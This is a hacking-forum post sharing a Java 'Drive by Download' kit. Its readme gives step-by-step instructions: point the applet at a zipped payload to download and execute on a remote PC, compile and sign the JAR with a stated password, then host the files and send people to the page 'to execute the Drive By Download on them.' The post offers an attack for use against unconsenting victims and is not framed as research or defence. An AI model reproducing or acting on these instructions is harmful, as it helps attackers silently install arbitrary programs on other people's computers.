Jump to content
Fi8sVrs

[Java] Drive by Download (DBD)

Recommended Posts

  • Active Members

DBD.jpg

Readme:

Step 1.) Open game.java and change fileLink to a link to a ZIPPED file that you want to download and execute to the remote pc..
Step 2.) whilst still in game.java change fileDir to the directory of the computer where you want to download your application to.
Step 3.) Find out what JDK version you have and edit the three .bat files to correspond to your JDK version - Example:

"C:\Program Files\Java\jdk1.6.0_16\bin\javac.exe" -cp . *.java

This shows my version of JDK is 1.6.0_16 if you go to 'C:\Program Files\Java\' and see what version of jdk you had e.g. 1.6.0_21 you would change the three files so that it
was like so:

"C:\Program Files\Java\jdk1.6.0_21\bin\javac.exe"

Step 4.) Run Compile.bat if no errors show then proceed to step 5.
Step 5.) Run Make JAR-FILE.bat
Step 6.) Run 'SIGN YOUR JAR.bat' and when prompted enter the password 'java123' it will not show your typing but it will be there after typing 'java123' hit enter.

Step 7.) Upload yourfile.zip, Client.html, and Client.jar to a webhost, and then send people to http://yourlink.com/Client.html to execute the Drive By Download on them.

Download

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...